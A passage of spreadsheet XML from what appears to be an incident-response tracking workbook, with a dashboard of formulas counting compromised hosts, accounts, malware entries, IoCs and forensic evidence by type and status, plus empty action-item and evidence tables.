  </dataValidations>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup orientation="portrait"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08DE617D-11F6-41A6-9116-9C6F89CD2312}">
          <x14:formula1>
            <xm:f>'Dropdown Lists Values'!$C$14:$C$16</xm:f>
          </x14:formula1>
          <xm:sqref>B13:B16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9953D-5D4E-481B-9EC2-4C4424143C67}">
  <sheetPr>
    <tabColor rgb="FF0062FF"/>
  </sheetPr>
  <dimension ref="A3:F39"/>
  <sheetViews>
    <sheetView topLeftCell="A4" workbookViewId="0">
      <selection activeCell="F24" sqref="F24"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15.75"/>
  <cols>
    <col min="1" max="1" width="24" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="30.69921875" customWidth="1"/>
    <col min="3" max="3" width="20.19921875" customWidth="1"/>
    <col min="4" max="4" width="2.19921875" customWidth="1"/>
    <col min="5" max="5" width="28" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="7.59765625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:6" ht="16.5" thickBot="1">
      <c r="A3" s="111"/>
      <c r="B3" s="111"/>
      <c r="C3" s="111"/>
      <c r="D3" s="111"/>
      <c r="E3" s="111"/>
      <c r="F3" s="111"/>
    </row>
    <row r="4" spans="1:6">
      <c r="A4" s="43" t="s">
        <v>41</v>
      </c>
      <c r="B4" s="112" t="s">
        <v>42</v>
      </c>
      <c r="C4" s="115">
        <f>COUNTA(_xlfn.UNIQUE(SystemOfInterest[Hostname]))</f>
        <v>1</v>
      </c>
      <c r="D4" s="111"/>
      <c r="E4" s="111"/>
      <c r="F4" s="111"/>
    </row>
    <row r="5" spans="1:6">
      <c r="A5" s="111"/>
      <c r="B5" s="113" t="s">
        <v>43</v>
      </c>
      <c r="C5" s="116">
        <f>COUNTIF(SystemOfInterest[Evidence Available],"Yes")</f>
        <v>0</v>
      </c>
      <c r="D5" s="111"/>
      <c r="E5" s="111"/>
      <c r="F5" s="111"/>
    </row>
    <row r="6" spans="1:6">
      <c r="A6" s="111"/>
      <c r="B6" s="113" t="s">
        <v>44</v>
      </c>
      <c r="C6" s="116">
        <f>COUNTIF(SystemOfInterest[Evidence Available],"No")</f>
        <v>0</v>
      </c>
      <c r="D6" s="111"/>
      <c r="E6" s="111"/>
      <c r="F6" s="111"/>
    </row>
    <row r="7" spans="1:6">
      <c r="A7" s="111"/>
      <c r="B7" s="113" t="s">
        <v>45</v>
      </c>
      <c r="C7" s="116">
        <f>COUNTIF(SystemOfInterest[Compromise status],"Added for the record")</f>
        <v>0</v>
      </c>
      <c r="D7" s="111"/>
      <c r="E7" s="111"/>
      <c r="F7" s="111"/>
    </row>
    <row r="8" spans="1:6">
      <c r="A8" s="111"/>
      <c r="B8" s="113" t="s">
        <v>46</v>
      </c>
      <c r="C8" s="116">
        <f>COUNTIF(SystemOfInterest[Analysis Status],"Completed analysis")</f>
        <v>0</v>
      </c>
      <c r="D8" s="111"/>
      <c r="E8" s="111"/>
      <c r="F8" s="111"/>
    </row>
    <row r="9" spans="1:6">
      <c r="A9" s="111"/>
      <c r="B9" s="111"/>
      <c r="C9" s="111"/>
      <c r="D9" s="111"/>
      <c r="E9" s="111"/>
      <c r="F9" s="111"/>
    </row>
    <row r="10" spans="1:6" ht="16.5" thickBot="1">
      <c r="A10" s="111"/>
      <c r="B10" s="111"/>
      <c r="C10" s="111"/>
      <c r="D10" s="111"/>
      <c r="E10" s="111"/>
      <c r="F10" s="111"/>
    </row>
    <row r="11" spans="1:6">
      <c r="A11" s="43" t="s">
        <v>47</v>
      </c>
      <c r="B11" s="113" t="s">
        <v>48</v>
      </c>
      <c r="C11" s="115" t="str">
        <f>IFERROR(INDEX(SystemOfInterest[Hostname],MATCH(MIN(SystemOfInterest[Earliest Evidence of Compromise]),SystemOfInterest[Earliest Evidence of Compromise],0),1),"No Data")</f>
        <v>No Data</v>
      </c>
      <c r="D11" s="111"/>
      <c r="E11" s="111"/>
      <c r="F11" s="111"/>
    </row>
    <row r="12" spans="1:6">
      <c r="A12" s="111"/>
      <c r="B12" s="113" t="s">
        <v>49</v>
      </c>
      <c r="C12" s="120" t="str">
        <f>IF(MIN(SystemOfInterest[Earliest Evidence of Compromise])=0,"No Data", MIN(SystemOfInterest[Earliest Evidence of Compromise]))</f>
        <v>No Data</v>
      </c>
      <c r="D12" s="111"/>
      <c r="E12" s="111"/>
      <c r="F12" s="111"/>
    </row>
    <row r="13" spans="1:6">
      <c r="A13" s="111"/>
      <c r="B13" s="113" t="s">
        <v>50</v>
      </c>
      <c r="C13" s="116" t="str">
        <f>IFERROR(INDEX(CompromisedAccounts[Account],MATCH(MIN(CompromisedAccounts[Earliest malicious activity]),CompromisedAccounts[Earliest malicious activity],0),1),"No Data")</f>
        <v>No Data</v>
      </c>
      <c r="D13" s="111"/>
      <c r="E13" s="111"/>
      <c r="F13" s="111"/>
    </row>
    <row r="14" spans="1:6">
      <c r="A14" s="111"/>
      <c r="B14" s="111"/>
      <c r="C14" s="111"/>
      <c r="D14" s="111"/>
      <c r="E14" s="111"/>
      <c r="F14" s="111"/>
    </row>
    <row r="15" spans="1:6" ht="16.5" thickBot="1">
      <c r="A15" s="111"/>
      <c r="B15" s="111"/>
      <c r="C15" s="111"/>
      <c r="D15" s="111"/>
      <c r="E15" s="111"/>
      <c r="F15" s="111"/>
    </row>
    <row r="16" spans="1:6">
      <c r="A16" s="43" t="s">
        <v>51</v>
      </c>
      <c r="B16" s="112" t="s">
        <v>52</v>
      </c>
      <c r="C16" s="115">
        <f>COUNTA(CompromisedAccounts[Account])</f>
        <v>0</v>
      </c>
      <c r="D16" s="111"/>
      <c r="E16" s="111"/>
      <c r="F16" s="111"/>
    </row>
    <row r="17" spans="1:6">
      <c r="A17" s="111"/>
      <c r="B17" s="113" t="s">
        <v>53</v>
      </c>
      <c r="C17" s="116">
        <f>COUNTA(MalwareAndTools[File Name])</f>
        <v>0</v>
      </c>
      <c r="D17" s="111"/>
      <c r="E17" s="111"/>
      <c r="F17" s="111"/>
    </row>
    <row r="18" spans="1:6">
      <c r="A18" s="111"/>
      <c r="B18" s="113" t="s">
        <v>54</v>
      </c>
      <c r="C18" s="116">
        <f>COUNTA(IOCs[IoC Value])</f>
        <v>0</v>
      </c>
      <c r="D18" s="111"/>
      <c r="E18" s="111"/>
      <c r="F18" s="111"/>
    </row>
    <row r="19" spans="1:6">
      <c r="A19" s="111"/>
      <c r="B19" s="111"/>
      <c r="C19" s="111"/>
      <c r="D19" s="111"/>
      <c r="E19" s="111"/>
      <c r="F19" s="111"/>
    </row>
    <row r="20" spans="1:6" ht="16.5" thickBot="1">
      <c r="A20" s="111"/>
      <c r="B20" s="111"/>
      <c r="C20" s="111"/>
      <c r="D20" s="111"/>
      <c r="E20" s="111"/>
      <c r="F20" s="111"/>
    </row>
    <row r="21" spans="1:6">
      <c r="A21" s="43" t="s">
        <v>55</v>
      </c>
      <c r="B21" s="112" t="s">
        <v>42</v>
      </c>
      <c r="C21" s="115">
        <f>COUNTA(Evidence[Hostname])</f>
        <v>0</v>
      </c>
      <c r="D21" s="111"/>
      <c r="E21" s="111"/>
      <c r="F21" s="111"/>
    </row>
    <row r="22" spans="1:6" ht="16.5" thickBot="1">
      <c r="A22" s="111"/>
      <c r="B22" s="117" t="s">
        <v>56</v>
      </c>
      <c r="C22" s="111"/>
      <c r="D22" s="111"/>
      <c r="E22" s="118" t="s">
        <v>57</v>
      </c>
      <c r="F22" s="111"/>
    </row>
    <row r="23" spans="1:6">
      <c r="A23" s="111"/>
      <c r="B23" s="112" t="str" cm="1">
        <f t="array" ref="B23:B33">_xlfn.UNIQUE(_xlfn._xlws.FILTER('Dropdown Lists Values'!C35:C45,1))</f>
        <v>Full disk image</v>
      </c>
      <c r="C23" s="115">
        <f>IF(B23="","",COUNTIF(Evidence[Type],B23))</f>
        <v>0</v>
      </c>
      <c r="D23" s="111"/>
      <c r="E23" s="112" t="str" cm="1">
        <f t="array" ref="E23:E37">_xlfn.UNIQUE(_xlfn._xlws.FILTER('Dropdown Lists Values'!C47:C61,1))</f>
        <v>To be requested</v>
      </c>
      <c r="F23" s="115">
        <f>IF(E23="","",COUNTIF(Evidence[Status],E23))</f>
        <v>0</v>
      </c>
    </row>
    <row r="24" spans="1:6">
      <c r="A24" s="111"/>
      <c r="B24" s="113" t="str">
        <v>VM disk source (VMDK/VHDX)</v>
      </c>
      <c r="C24" s="116">
        <f>IF(B24="","",COUNTIF(Evidence[Type],B24))</f>
        <v>0</v>
      </c>
      <c r="D24" s="111"/>
      <c r="E24" s="113" t="str">
        <v>Requested</v>
      </c>
      <c r="F24" s="116">
        <f>IF(E24="","",COUNTIF(Evidence[Status],E24))</f>
        <v>0</v>
      </c>
    </row>
    <row r="25" spans="1:6">
      <c r="A25" s="111"/>
      <c r="B25" s="113" t="str">
        <v>Memory image</v>
      </c>
      <c r="C25" s="116">
        <f>IF(B25="","",COUNTIF(Evidence[Type],B25))</f>
        <v>0</v>
      </c>
      <c r="D25" s="111"/>
      <c r="E25" s="113" t="str">
        <v>Delivered</v>
      </c>
      <c r="F25" s="116">
        <f>IF(E25="","",COUNTIF(Evidence[Status],E25))</f>
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:6">
      <c r="A26" s="111"/>
      <c r="B26" s="113" t="str">
        <v>Triage - Velo IR RAW collector</v>
      </c>
      <c r="C26" s="116">
        <f>IF(B26="","",COUNTIF(Evidence[Type],B26))</f>
        <v>0</v>
      </c>
      <c r="D26" s="111"/>
      <c r="E26" s="113" t="str">
        <v>Requires verification</v>
      </c>
      <c r="F26" s="116">
        <f>IF(E26="","",COUNTIF(Evidence[Status],E26))</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" spans="1:6">
      <c r="A27" s="111"/>
      <c r="B27" s="113" t="str">
        <v>Triage - Velo Fast IR collector</v>
      </c>
      <c r="C27" s="116">
        <f>IF(B27="","",COUNTIF(Evidence[Type],B27))</f>
        <v>0</v>
      </c>
      <c r="D27" s="111"/>
      <c r="E27" s="113" t="str">
        <v>Verified</v>
      </c>
      <c r="F27" s="116">
        <f>IF(E27="","",COUNTIF(Evidence[Status],E27))</f>
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:6">
      <c r="A28" s="111"/>
      <c r="B28" s="113" t="str">
        <v>Triage - Velo ATA collector</v>
      </c>
      <c r="C28" s="116">
        <f>IF(B28="","",COUNTIF(Evidence[Type],B28))</f>
        <v>0</v>
      </c>
      <c r="D28" s="111"/>
      <c r="E28" s="113" t="str">
        <v>To be assigned</v>
      </c>
      <c r="F28" s="116">
        <f>IF(E28="","",COUNTIF(Evidence[Status],E28))</f>
        <v>0</v>
      </c>
    </row>
    <row r="29" spans="1:6">
      <c r="A29" s="111"/>
      <c r="B29" s="113" t="str">
        <v>Triage - UAC</v>
      </c>
      <c r="C29" s="116">
        <f>IF(B29="","",COUNTIF(Evidence[Type],B29))</f>
        <v>0</v>
      </c>
      <c r="D29" s="111"/>
      <c r="E29" s="113" t="str">
        <v>Assigned</v>
      </c>
      <c r="F29" s="116">
        <f>IF(E29="","",COUNTIF(Evidence[Status],E29))</f>
        <v>0</v>
      </c>
    </row>
    <row r="30" spans="1:6">
      <c r="A30" s="111"/>
      <c r="B30" s="113" t="str">
        <v>Triage - LRC (triage + memory)</v>
      </c>
      <c r="C30" s="116">
        <f>IF(B30="","",COUNTIF(Evidence[Type],B30))</f>
        <v>0</v>
      </c>
      <c r="D30" s="111"/>
      <c r="E30" s="113" t="str">
        <v>Ongoing analysis</v>
      </c>
      <c r="F30" s="116">
        <f>IF(E30="","",COUNTIF(Evidence[Status],E30))</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" spans="1:6">
      <c r="A31" s="111"/>
      <c r="B31" s="113" t="str">
        <v>Logs</v>
      </c>
      <c r="C31" s="116">
        <f>IF(B31="","",COUNTIF(Evidence[Type],B31))</f>
        <v>0</v>
      </c>
      <c r="D31" s="111"/>
      <c r="E31" s="113" t="str">
        <v>Completed analysis</v>
      </c>
      <c r="F31" s="116">
        <f>IF(E31="","",COUNTIF(Evidence[Status],E31))</f>
        <v>0</v>
      </c>
    </row>
    <row r="32" spans="1:6">
      <c r="A32" s="111"/>
      <c r="B32" s="113" t="str">
        <v>AD dump</v>
      </c>
      <c r="C32" s="116">
        <f>IF(B32="","",COUNTIF(Evidence[Type],B32))</f>
        <v>0</v>
      </c>
      <c r="D32" s="111"/>
      <c r="E32" s="113" t="str">
        <v>Data already destroyed</v>
      </c>
      <c r="F32" s="116">
        <f>IF(E32="","",COUNTIF(Evidence[Status],E32))</f>
        <v>0</v>
      </c>
    </row>
    <row r="33" spans="1:6">
      <c r="A33" s="111"/>
      <c r="B33" s="113" t="str">
        <v>Other</v>
      </c>
      <c r="C33" s="116">
        <f>IF(B33="","",COUNTIF(Evidence[Type],B33))</f>
        <v>0</v>
      </c>
      <c r="D33" s="111"/>
      <c r="E33" s="113" t="str">
        <v>Never provided by a Client</v>
      </c>
      <c r="F33" s="116">
        <f>IF(E33="","",COUNTIF(Evidence[Status],E33))</f>
        <v>0</v>
      </c>
    </row>
    <row r="34" spans="1:6">
      <c r="A34" s="111"/>
      <c r="B34" s="113"/>
      <c r="C34" s="116" t="str">
        <f>IF(B34="","",COUNTIF(Evidence[Type],B34))</f>
        <v/>
      </c>
      <c r="D34" s="111"/>
      <c r="E34" s="113" t="str">
        <v>Returned to analyst for correction</v>
      </c>
      <c r="F34" s="116">
        <f>IF(E34="","",COUNTIF(Evidence[Status],E34))</f>
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="1:6">
      <c r="A35" s="111"/>
      <c r="B35" s="113"/>
      <c r="C35" s="116" t="str">
        <f>IF(B35="","",COUNTIF(Evidence[Type],B35))</f>
        <v/>
      </c>
      <c r="D35" s="111"/>
      <c r="E35" s="113" t="str">
        <v>Analysis cancelled</v>
      </c>
      <c r="F35" s="116">
        <f>IF(E35="","",COUNTIF(Evidence[Status],E35))</f>
        <v>0</v>
      </c>
    </row>
    <row r="36" spans="1:6">
      <c r="A36" s="111"/>
      <c r="B36" s="113"/>
      <c r="C36" s="116" t="str">
        <f>IF(B36="","",COUNTIF(Evidence[Type],B36))</f>
        <v/>
      </c>
      <c r="D36" s="111"/>
      <c r="E36" s="113" t="str">
        <v>Unknown</v>
      </c>
      <c r="F36" s="116">
        <f>IF(E36="","",COUNTIF(Evidence[Status],E36))</f>
        <v>0</v>
      </c>
    </row>
    <row r="37" spans="1:6">
      <c r="A37" s="111"/>
      <c r="B37" s="113"/>
      <c r="C37" s="116" t="str">
        <f>IF(B37="","",COUNTIF(Evidence[Type],B37))</f>
        <v/>
      </c>
      <c r="D37" s="111"/>
      <c r="E37" s="113" t="str">
        <v>Other</v>
      </c>
      <c r="F37" s="116">
        <f>IF(E37="","",COUNTIF(Evidence[Status],E37))</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" spans="1:6" ht="16.5" thickBot="1">
      <c r="A38" s="111"/>
      <c r="B38" s="114"/>
      <c r="C38" s="119" t="str">
        <f>IF(B38="","",COUNTIF(Evidence[Type],B38))</f>
        <v/>
      </c>
      <c r="D38" s="111"/>
      <c r="E38" s="114"/>
      <c r="F38" s="119" t="str">
        <f>IF(E38="","",COUNTIF(Evidence[Status],E38))</f>
        <v/>
      </c>
    </row>
    <row r="39" spans="1:6">
      <c r="A39" s="111"/>
      <c r="B39" s="111"/>
      <c r="C39" s="111"/>
      <c r="D39" s="111"/>
      <c r="E39" s="111"/>
      <c r="F39" s="111"/>
    </row>
  </sheetData>
  <dataValidations count="1">
    <dataValidation allowBlank="1" showInputMessage="1" showErrorMessage="1" promptTitle="Auto-Generated Data" prompt="This cell is automatically populated from various data sources in this document. Avoid overwriting manually to prevent discrepancies." sqref="C11:C13 C16:C18 C4:C7 C21 C23:C38 F23:F38" xr:uid="{D2AB020D-3572-4C7F-83AA-F418CAE5A699}"/>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0062FF"/>
  </sheetPr>
  <dimension ref="A1:K26"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B11" sqref="B11"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="11.09765625" defaultRowHeight="15.75"/>
  <cols>
    <col min="1" max="1" width="12.69921875" customWidth="1"/>
    <col min="2" max="2" width="12.09765625" style="87" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="13.796875" customWidth="1"/>
    <col min="4" max="4" width="12.09765625" customWidth="1"/>
    <col min="5" max="5" width="10.796875" customWidth="1"/>
    <col min="6" max="6" width="13.19921875" customWidth="1"/>
    <col min="7" max="7" width="15.69921875" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="11.796875" customWidth="1"/>
    <col min="9" max="9" width="14.3984375" customWidth="1"/>
    <col min="10" max="10" width="23.296875" customWidth="1"/>
    <col min="11" max="11" width="55.3984375" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:11">
      <c r="A1" t="s">
        <v>58</v>
      </c>
      <c r="B1" s="87" t="s">
        <v>59</v>
      </c>
      <c r="C1" t="s">
        <v>60</v>
      </c>
      <c r="D1" t="s">
        <v>61</v>
      </c>
      <c r="E1" t="s">
        <v>62</v>
      </c>
      <c r="F1" t="s">
        <v>63</v>
      </c>
      <c r="G1" t="s">
        <v>64</v>
      </c>
      <c r="H1" t="s">
        <v>65</v>
      </c>
      <c r="I1" t="s">
        <v>66</v>
      </c>
      <c r="J1" t="s">
        <v>67</v>
      </c>
      <c r="K1" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="2" spans="1:11">
      <c r="A2">
        <v>1</v>
      </c>
      <c r="F2" s="87"/>
      <c r="G2" s="87"/>
    </row>
    <row r="3" spans="1:11">
      <c r="A3">
        <v>2</v>
      </c>
      <c r="F3" s="87"/>
      <c r="G3" s="87"/>
    </row>
    <row r="4" spans="1:11">
      <c r="A4">
        <v>3</v>
      </c>
      <c r="F4" s="87"/>
      <c r="G4" s="87"/>
    </row>
    <row r="5" spans="1:11">
      <c r="A5">
        <v>4</v>
      </c>
      <c r="F5" s="87"/>
      <c r="G5" s="87"/>
    </row>
    <row r="6" spans="1:11">
      <c r="A6">
        <v>5</v>
      </c>
      <c r="F6" s="87"/>
      <c r="G6" s="87"/>
    </row>
    <row r="7" spans="1:11">
      <c r="A7">
        <v>6</v>
      </c>
      <c r="F7" s="87"/>
      <c r="G7" s="87"/>
    </row>
    <row r="8" spans="1:11">
      <c r="A8">
        <v>7</v>
      </c>
      <c r="F8" s="87"/>
      <c r="G8" s="87"/>
    </row>
    <row r="9" spans="1:11">
      <c r="A9">
        <v>8</v>
      </c>
      <c r="F9" s="87"/>
      <c r="G9" s="87"/>
    </row>
    <row r="10" spans="1:11">
      <c r="A10">
        <v>9</v>
      </c>
      <c r="F10" s="87"/>
      <c r="G10" s="87"/>
    </row>
    <row r="11" spans="1:11">
      <c r="A11">
        <v>10</v>
      </c>
      <c r="F11" s="87"/>
      <c r="G11" s="87"/>
    </row>
    <row r="12" spans="1:11">
      <c r="A12">
        <v>11</v>
      </c>
      <c r="F12" s="87"/>
      <c r="G12" s="87"/>
    </row>
    <row r="13" spans="1:11">
      <c r="A13">
        <v>12</v>
      </c>
      <c r="F13" s="87"/>
      <c r="G13" s="87"/>
    </row>
    <row r="14" spans="1:11">
      <c r="A14">
        <v>13</v>
      </c>
      <c r="F14" s="87"/>
      <c r="G14" s="87"/>
    </row>
    <row r="15" spans="1:11">
      <c r="A15">
        <v>14</v>
      </c>
      <c r="F15" s="87"/>
      <c r="G15" s="87"/>
    </row>
    <row r="16" spans="1:11">
      <c r="A16">
        <v>15</v>
      </c>
      <c r="F16" s="87"/>
      <c r="G16" s="87"/>
    </row>
    <row r="17" spans="1:11">
      <c r="A17">
        <v>16</v>
      </c>
      <c r="F17" s="87"/>
      <c r="G17" s="87"/>
    </row>
    <row r="18" spans="1:11">
      <c r="A18">
        <v>17</v>
      </c>
      <c r="F18" s="87"/>
      <c r="G18" s="87"/>
    </row>
    <row r="19" spans="1:11">
      <c r="A19">
        <v>18</v>
      </c>
      <c r="F19" s="87"/>
      <c r="G19" s="87"/>
    </row>
    <row r="20" spans="1:11">
      <c r="A20">
        <v>19</v>
      </c>
      <c r="F20" s="87"/>
      <c r="G20" s="87"/>
    </row>
    <row r="21" spans="1:11">
      <c r="A21">
        <v>20</v>
      </c>
      <c r="F21" s="87"/>
      <c r="G21" s="87"/>
    </row>
    <row r="22" spans="1:11">
      <c r="A22">
        <v>21</v>
      </c>
      <c r="F22" s="87"/>
      <c r="G22" s="87"/>
    </row>
    <row r="23" spans="1:11">
      <c r="A23">
        <v>22</v>
      </c>
      <c r="F23" s="87"/>
      <c r="G23" s="87"/>
    </row>
    <row r="24" spans="1:11">
      <c r="A24">
        <v>23</v>
      </c>
      <c r="F24" s="87"/>
      <c r="G24" s="87"/>
    </row>
    <row r="25" spans="1:11" ht="16.5" thickBot="1">
      <c r="A25">
        <v>24</v>
      </c>
      <c r="F25" s="87"/>
      <c r="G25" s="87"/>
    </row>
    <row r="26" spans="1:11" ht="16.5" thickBot="1">
      <c r="A26" s="19" t="s">
        <v>23</v>
      </c>
      <c r="B26" s="88"/>
      <c r="C26" s="9"/>
      <c r="D26" s="9"/>
      <c r="E26" s="9"/>
      <c r="F26" s="9"/>
      <c r="G26" s="9"/>
      <c r="H26" s="9"/>
      <c r="I26" s="9"/>
      <c r="J26" s="9"/>
      <c r="K26" s="10"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="D1:D1048576">
    <cfRule type="cellIs" dxfId="245" priority="1" operator="equal">
      <formula>"Abandoned"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="244" priority="6" operator="equal">
      <formula>"Incomplete"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="243" priority="7" operator="equal">
      <formula>"Not Started"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="242" priority="8" operator="equal">
      <formula>"In-Progress"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="241" priority="9" operator="equal">
      <formula>"Completed"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A2:A25">
    <cfRule type="duplicateValues" dxfId="240" priority="30"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="H2:H25">
    <cfRule type="cellIs" dxfId="239" priority="2" operator="equal">
      <formula>"Critical"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="238" priority="3" operator="equal">
      <formula>"High"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="237" priority="4" operator="equal">
      <formula>"Medium"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="236" priority="5" operator="equal">
      <formula>"Low"</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="2">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25" xr:uid="{8DDD2787-FAB4-404C-B7BC-F0E0FBC3361B}">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25 E2:E3 E5:E25 E4" xr:uid="{C06F08A0-F62B-4ADB-9B89-1DC400A9644F}">
      <formula1>members_NamedRange</formula1>
    </dataValidation>
  </dataValidation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s Values' tab under &quot;Action Items &gt; Status&quot;." xr:uid="{D78E9666-74DE-4A58-9B52-3E12388D5315}">
          <x14:formula1>
            <xm:f>'Dropdown Lists Values'!$C$19:$C$23</xm:f>
          </x14:formula1>
          <xm:sqref>D2:D25</xm:sqref>
        </x14:dataValidation>
        <x14:dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" errorTitle="Invalid Option Entered" error="Please choose from a valid list of options from the drop down list._x000a__x000a_If required, you may add this as an option to the drop down list by adding it in 'Dropdown List Values' tab under &quot;Action Items &gt; Priority&quot;." xr:uid="{40F4BAC5-42D6-4B8E-99CD-4D73A2302544}">
          <x14:formula1>
            <xm:f>'Dropdown Lists Values'!$C$8:$C$11</xm:f>
          </x14:formula1>
          <xm:sqref>H2:H25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0062FF"/>
  </sheetPr>
  <dimension ref="A1:S30"/>
  <sheetViews>
    <sheetView zoomScaleNormal="100" workbookViewId="0">
      <pane xSplit="1" topLeftCell="B1" activePane="topRight" state="frozen"/>
      <selection pane="topRight" activeCell="A8" sqref="A8"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="11.09765625" defaultRowHeight="15.75"/>
  <cols>
    <col min="1" max="1" width="24.09765625" customWidth="1"/>
    <col min="2" max="2" width="13.3984375" customWidth="1"/>
    <col min="3" max="3" width="14" customWidth="1"/>
    <col min="4" max="4" width="21.3984375" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="20" customWidth="1"/>
    <col min="6" max="6" width="16.19921875" customWidth="1"/>
    <col min="7" max="7" width="9.296875" customWidth="1"/>
    <col min="8" max="8" width="9.296875" style="109" customWidth="1"/>
    <col min="9" max="9" width="15.296875" customWidth="1"/>
    <col min="10" max="10" width="15.796875" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="14.69921875" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="17" customWidth="1"/>
    <col min="13" max="13" width="14.796875" customWidth="1"/>
    <col min="14" max="14" width="15.19921875" customWidth="1"/>
    <col min="15" max="15" width="16.19921875" customWidth="1"/>
    <col min="16" max="17" width="21.69921875" customWidth="1"/>
    <col min="18" max="18" width="20.19921875" customWidth="1"/>
    <col min="19" max="19" width="120.69921875" customWidth="1"/>
    <col min="20" max="20" width="49.59765625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:19">
      <c r="A1" t="s">
        <v>69</v>
      </c>
      <c r="B1" t="s">
        <v>3</v>
      </c>
      <c r="C1" t="s">
        <v>70</v>
      </c>
      <c r="D1" t="s">
        <v>71</v>
      </c>
      <c r="E1" t="s">
        <v>61</v>
      </c>
      <c r="F1" t="s">
        <v>72</v>
      </c>
      <c r="G1" t="s">
        <v>73</v>
      </c>
      <c r="H1" s="109" t="s">
        <v>65</v>
      </c>
      <c r="I1" t="s">
        <v>74</v>
      </c>
      <c r="J1" t="s">
        <v>75</v>
      </c>
      <c r="K1" t="s">
        <v>76</v>
      </c>
      <c r="L1" t="s">
        <v>77</v>
      </c>
      <c r="M1" t="s">
        <v>78</v>
      </c>
      <c r="N1" t="s">
        <v>79</v>
      </c>
      <c r="O1" t="s">
        <v>80</v>
      </c>
      <c r="P1" t="s">
        <v>81</v>
      </c>
      <c r="Q1" t="s">
        <v>82</v>
      </c>
      <c r="R1" t="s">
        <v>83</v>
      </c>
      <c r="S1" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="2" spans="1:19">
      <c r="B2" s="87"/>
      <c r="G2" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J2" s="87"/>
      <c r="K2" s="87"/>
    </row>
    <row r="3" spans="1:19">
      <c r="B3" s="87"/>
      <c r="G3" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J3" s="87"/>
      <c r="K3" s="87"/>
    </row>
    <row r="4" spans="1:19">
      <c r="B4" s="87"/>
      <c r="G4" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J4" s="87"/>
      <c r="K4" s="87"/>
    </row>
    <row r="5" spans="1:19">
      <c r="B5" s="87"/>
      <c r="G5" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J5" s="87"/>
      <c r="K5" s="87"/>
    </row>
    <row r="6" spans="1:19">
      <c r="B6" s="87"/>
      <c r="G6" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J6" s="87"/>
      <c r="K6" s="87"/>
    </row>
    <row r="7" spans="1:19">
      <c r="B7" s="87"/>
      <c r="G7" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J7" s="87"/>
      <c r="K7" s="87"/>
    </row>
    <row r="8" spans="1:19">
      <c r="B8" s="87"/>
      <c r="G8" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J8" s="87"/>
      <c r="K8" s="87"/>
    </row>
    <row r="9" spans="1:19">
      <c r="B9" s="87"/>
      <c r="G9" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J9" s="87"/>
      <c r="K9" s="87"/>
    </row>
    <row r="10" spans="1:19">
      <c r="B10" s="87"/>
      <c r="G10" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J10" s="87"/>
      <c r="K10" s="87"/>
    </row>
    <row r="11" spans="1:19">
      <c r="B11" s="87"/>
      <c r="G11" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J11" s="87"/>
      <c r="K11" s="87"/>
    </row>
    <row r="12" spans="1:19">
      <c r="B12" s="87"/>
      <c r="G12" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J12" s="87"/>
